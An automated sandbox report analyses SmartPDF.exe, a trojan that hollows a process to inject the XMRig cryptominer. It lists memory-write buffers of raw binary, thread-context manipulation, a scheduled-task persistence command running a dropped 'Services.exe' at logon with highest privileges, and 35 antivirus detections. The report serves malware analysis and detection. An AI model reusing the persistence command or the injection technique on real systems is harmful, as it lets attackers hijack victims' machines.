FØÂ8ßp§\I"¿¹&b%MIìªÎ¹ï7x-æltV/Nå,¶÷;fffffffffffffffffffffDF@ÀHÝHãÿÿ?HÁãHßHEH%ÿÿ?HÁàHÇH$HEH%ÿÿ?HÁàHÇHD$HEH%ÿÿ?HÁàHÇHD$HEH%ÿÿ?HÁàHÇHD$LEL¯ïþÿÿL ðþÿÿM3ÈLîþÿÿM3ÐLìþÿÿM3ØL%êþÿÿM3àL-èþÿÿM3èL5æþÿÿM3ðL=äþÿÿM3øHl$ Äâ}D$ ÅýÔmþÿÿÄâ} þÿÿÅ½sÐ ÅµsÑ Å}ôÑÅ5ôØÅ½ôÁÄÁ%só Åýsð ÄA-ÔÓÅÔÀÄâ} aþÿÿÅýïÉÄâ}\þÿÿÅýïÒÄâ}WþÿÿÅýïÛÄâ}%RþÿÿÅýïäÄâ}-MþÿÿÅýïíÄâ}5HþÿÿÅýïöÄâ}=CþÿÿÅýïÿÄb}=öýÿÿÄÁ s÷LÅ}lÁLNÅmlËLVÅ]lÕL^ÅMlßLf Å}máLn(ÅmmëLv0Å]mõL~8ÅMmÿÄÃ=FÁ ÄÃ-FË ÅþF@ÅþN`ÄÃFÕ ÄÃ Fß ÅþÅþ ÄÃ=Fá1ÄÃ-Fë1Åþ¦ÀÅþ®àÄÃFõ1ÄÃ Fÿ1Åþ¶Åþ¾ HÅHÆ@H;l$(HÄ(AYóo$óoL$óoT$ óo\$0óod$@óol$Póot$`óo\|$póDo$óDo$óDo$ óDo$°óDo¤$ÀóDo¬$ÐóDo´$àóDo¼$ðÅøwHÄA_A^A]A\^_][ÃHì(H$Å~t$HD$(H\$0HL$8HT$@Å~oÅ~oÅ~oÅ~oÄA=láÄA-lëÄCFõ ÄÁ}ïÆÄCFõ1ÄÁmïÖÄA=máÄA-mëÄCFõ ÄÁuïÎÄCFõ1ÄÁeïÞÅ~o@ Å~oK Å~oQ Å~oZ ÄA=láÄA-lëÄCFõ ÄÁ]ïæÄCFõ1ÄÁMïöÄA=máÄA-mëÄCFõ ÄÁUïîÄCFõ1ÄÁEïþH$Å~ot$HÄ(Åþ$H$H%ÿÿ?HÁàHÇH$HD$H%ÿÿ?HÁàHÇHD$HD$H%ÿÿ?HÁàHÇHD$HD$H%ÿÿ?HÁàHÇHD$HÄ(YLLILQLYLa Li(Lq0Ly8fA@fIPfQ`fYpHI@fa@fiPfq`fypóDo<$óDot$óDol$ óDod$0óDo\$@HÄPóDo$óDoL$óDoD$ óo\|$0óot$@HÄPA_A^A]A\^_][ÃfffffffffffffffffL3L3KL3SL3[L3c L3k(L3s0L3{8Hãÿÿ?HÁãHßfffffffLCHãÿÿ?HÁãHßL¯cL dM3ÈLbM3ÐL`M3ØL%^M3àL-\M3èL5ZM3ðL=XM3øéXffffffff-L-ôQXü¡õY FØÂ8ßp§\I"¿¹&b%MIìªÎ¹ï7x-æltV*/Nå,¶÷;ºLÁ3ÀH½ÉHÓâI÷ðÃ base_address: 0x0000000140747000 process_identifier: 2392 process_handle: 0x0000000000000484	1	1
WriteProcessMemory Sept. 13, 2021, 9:14 a.m.	buffer: ÅøwH\$Ht$H\|$UATAUAVAWHìPót$@ó\|$0óDD$ óDL$óD$HìPóD\$@óDd$0óDl$ óDt$óD<$Hì@Hl$@HåàÅùïÀ3ÿÇELâÇE LòÇE IÁîAäÇEMèÆE HñßÅýE ÅýE@ÅýE`ÅýÅý ÅýÀÅýàMöt>¶DHM HÁHH1L{Hûu HM èñHûHÇIEÇHÆHØIîuÂH×MätLÇ¶2HÿÂÄâ¹÷ÈHùIÀI;Ôrè¶DHU HÂ¹JåÄâù÷ÉH3 ¸HÁà?H3ÏH H1EhHM èxÅüE ÄÁ\|EÅøwHÄ@óDo<$óDot$óDol$ óDod$0óDo\$@HÄPóDo$óDoL$óDoD$ óo\|$0óot$@HÄPA_A^A]A\]H\$Ht$H\|$ÃLL ÖL/¸HI`Äâ}YA ÅþoI¨ÅþoQÈÅþoYèÅþoaÅþoi(ÅþoqHfÅ}pêNÅUïãÅ]ïÎÅïáÄAïáÄCýÜÅïêÄÃýýNÄÁ=sÔ?ÄAÔÌÄA=ëÁÄCýø9ÄA=ïóÄCýöÅïèÅïïÄÁEsÕ?ÄAÔÅÅ=ëÇÄÁmïÖÄÁ}ïÆÄCøÀÄC%ÝÄAïûÄBíGP ÄÂíEQ ÄÁmëÒÄÁeïßÄBåGXàÄÂåEYàÄÁeëÛÄÁ]ïçÄBÝG ÄÂÝE!ÄÁ]ëäÄÁUïïÄBÕGh ÄÂÕEi ÄÁUëíÄÁMï÷ÄcýÒÄcýÛÄBÍGp@ÄBÍEA@ÄA=ëÆÄÁuïÏÄcýäÄcýírÄBõGxÀÄBõEIÀÄA5ëÏÄÁ sØÄÁ=ßþÄÃ5ÝÄC%ùÄÃ-ëÄC5òÄÃeÛ0ÄCü0ÄÃUé0ÄC õ0ÄÃeÜÀÄCýÀÄÃUíÀÄC óÀÄÁeßßÄÁUßîÄÃñÄC-üÄÁeïÚÄÃMò0ÄCû0ÄÁUïìÄÃMóÀÄCùÀÄÁMß÷ÄÁMïõÄÃýàÄc]ø0ÄÃýÈ9ÄãuÈÀÄÁußÏÄÃ%ÔÄCóÄÃmÕ0ÄC ò0ÄÃmÒÀÄC ôÀÄÁmßÖÄÁmïÑÄãýÿÄãýÛÄãýíÄãýörÄÃâÄCõÄÃ]ä0ÄC ñ0ÄÃ]áÀÄC òÀÄÁ]ßæÅýïÇÄÁuïÈÄÁ]ïãÄÁ}ïMR ÿÈ²ýÿÿÄáù~A ÅþI¨ÅþQÈÅþYèÅþaÅþi(ÅþqHÃfffff$)>-8' =7,+=.?$%:6 8>1',+2 base_address: 0x0000000140748000 process_identifier: 2392 process_handle: 0x0000000000000484	1	1
WriteProcessMemory Sept. 13, 2021, 9:14 a.m.	buffer: base_address: 0x0000000140749000 process_identifier: 2392 process_handle: 0x0000000000000484	1	1
WriteProcessMemory Sept. 13, 2021, 9:14 a.m.	buffer: base_address: 0x000000014074b000 process_identifier: 2392 process_handle: 0x0000000000000484	1	1
WriteProcessMemory Sept. 13, 2021, 9:14 a.m.	buffer: Ð0ï0Ñ0ß00 000@0Ø0p0000X0 0À0õ0¢0¢0Ç¢0¢0¤¢0´¢0Ä¢0¢0Ì¢0¨¢0à¢0Ð¢0 ¢0°¢0À¢0¢0è¢0 base_address: 0x000000014074d000 process_identifier: 2392 process_handle: 0x0000000000000484	1	1
WriteProcessMemory Sept. 13, 2021, 9:14 a.m.	buffer: 8Ph àt0ãt}4VS_VERSION_INFO½ïþ?êStringFileInfoÆ000004b0<CompanyNamewww.xmrig.com@FileDescriptionXMRig miner.FileVersion6.12.1h"LegalCopyrightCopyright (C) 2016-2021 xmrig.com< OriginalFilenamexmrig.exe,ProductNameXMRig2ProductVersion6.12.1DVarFileInfo$Translation°<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x000000014074e000 process_identifier: 2392 process_handle: 0x0000000000000484	1	1
WriteProcessMemory Sept. 13, 2021, 9:14 a.m.	buffer: base_address: 0x000000014074f000 process_identifier: 2392 process_handle: 0x0000000000000484	1	1
NtGetContextThread Sept. 13, 2021, 9:14 a.m.	thread_handle: 0x0000000000000480	1	0
WriteProcessMemory Sept. 13, 2021, 9:14 a.m.	buffer: @ base_address: 0x000007fffffd4010 process_identifier: 2392 process_handle: 0x0000000000000484	1	1
NtSetContextThread Sept. 13, 2021, 9:14 a.m.	registers.r14: 0 registers.r15: 0 registers.rcx: 5371770476 registers.rsi: 0 registers.r10: 0 registers.rbx: 0 registers.rsp: 1506776 registers.r11: 0 registers.r8: 0 registers.r9: 0 registers.rip: 2006107392 registers.rdx: 8796092841984 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 0 registers.r13: 0 thread_handle: 0x0000000000000480 process_identifier: 2392	1	0
NtResumeThread Sept. 13, 2021, 9:14 a.m.	thread_handle: 0x0000000000000480 suspend_count: 1 process_identifier: 2392	1	0
CreateProcessInternalW Sept. 13, 2021, 9:13 a.m.	thread_identifier: 1984 thread_handle: 0x0000000000000060 process_identifier: 1896 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\test22\AppData\Local\Temp\Services.exe"' filepath_r: C:\Windows\system32\schtasks.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000064	1	1
NtResumeThread Sept. 13, 2021, 9:14 a.m.	thread_handle: 0x00000000000000c4 suspend_count: 1 process_identifier: 2332	1	0
NtResumeThread Sept. 13, 2021, 9:14 a.m.	thread_handle: 0x0000000000000134 suspend_count: 1 process_identifier: 2332	1	0

File has been identified by 35 AntiVirus engines on VirusTotal as malicious (35 events)

Lionic	Trojan.Win32.Generic.4!c
Elastic	malicious (high confidence)
McAfee	Artemis!9774CDF92008
Cylance	Unsafe
K7AntiVirus	Trojan ( 0057c5721 )
Alibaba	Trojan:Win32/CoinMiner.ali1002002
K7GW	Trojan ( 0057c5721 )
Symantec	Trojan.Gen.MBT
ESET-NOD32	a variant of MSIL/Kryptik.AAWO
APEX	Malicious
Paloalto	generic.ml
Kaspersky	HEUR:Trojan.Win32.Generic
BitDefender	Gen:Variant.Bulz.710351
Avast	Win64:CoinminerX-gen [Trj]
Tencent	Msil.Trojan.Kryptik.Htvo
Sophos	Mal/Generic-R + Troj/Kryptik-XQ
DrWeb	Trojan.PackedNET.721
TrendMicro	TROJ_FRS.0NA103IC21
McAfee-GW-Edition	Artemis
FireEye	Generic.mg.9774cdf92008b796
Emsisoft	Trojan.Crypt (A)
SentinelOne	Static AI - Malicious PE
Avira	HEUR/AGEN.1143066
Gridinsoft	Trojan.Win64.CoinMiner.vb
Microsoft	Trojan:Win32/AgentTesla!ml
GData	MSIL.Malware.Coinminer.A9SIVN
Cynet	Malicious (score: 99)
AhnLab-V3	Trojan/Win.Generic.C4463109
Malwarebytes	Malware.AI.4277280688
Rising	Trojan.Kryptik/MSIL!1.D6FC (CLASSIC)
Ikarus	Trojan.MSIL.Crypt
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	MSIL/GenKryptik.FFBT!tr
AVG	Win64:CoinminerX-gen [Trj]
Panda	Trj/CI.A

SmartPDF.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All